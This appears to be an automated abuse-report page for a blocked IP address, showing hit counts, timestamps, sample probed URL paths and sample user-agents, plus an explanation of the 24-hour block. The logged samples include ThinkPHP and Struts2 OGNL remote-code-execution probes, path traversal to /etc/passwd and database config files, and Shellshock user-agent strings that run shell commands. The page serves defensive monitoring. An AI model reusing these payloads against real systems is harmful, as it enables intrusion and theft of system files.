abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 56
- Unique targets hit
- 1
- Unique paths probed
- 894
- Detection count
- 6
- First seen
- 2026-07-18 20:46:07 UTC
- Last seen
- 2026-07-18 21:33:45 UTC
- Block expires
- 2026-07-19 21:51:17 UTC
Sample paths probed
- /index.php?s=/Index/\think\app/invokefunction
- /index.php?s=/aa/bb/name/$%7B@printf(43835*44282)%7D
- /system/mediafile/templateOfTaohong_manager.jsp?path=/../../../
- /h2-console
- /index.action?debug=command&expression=(42874*41985)
- /index.php
- /login.action?debug=command&expression=(44159*41450)
- /?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43req%[email protected]@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27%5C43xman%[email protected]@getResponse%28%29%27%29%28d%29%29&%28i97%29%28%28%27%5C43xman.getWriter%28%29.println%2843538*42806%29%27%29%28d%29%29&%28i99%29%28%28%27%5C43xman.getWriter%28%29.close%28%29%27%29%28d%29%29
- //etc/passwd
- /
- /index.php?s=captcha
- /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php
- /index.php/captcha
- /index.php/Index/%5Cthink%5Capp/invokefunction
- /866719366.php
- /authenticationserverservlet
- /login.action?debug=command&expression=(43344*40886)
- /rwzscdadsu
- /index.action?debug=command&expression=(41253*44655)
- /zzgfxfysra
Sample User-Agents
- () { :; }; echo ; echo ; /bin/cat /etc/passwd
- Report Runner
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:150.0) Gecko/20100101 Firefox/150.0
- TNAS
- Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
- Nacos-Server
- () { :; }; echo; echo; /bin/bash -c 'expr 824002045 + 849897607'
- Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.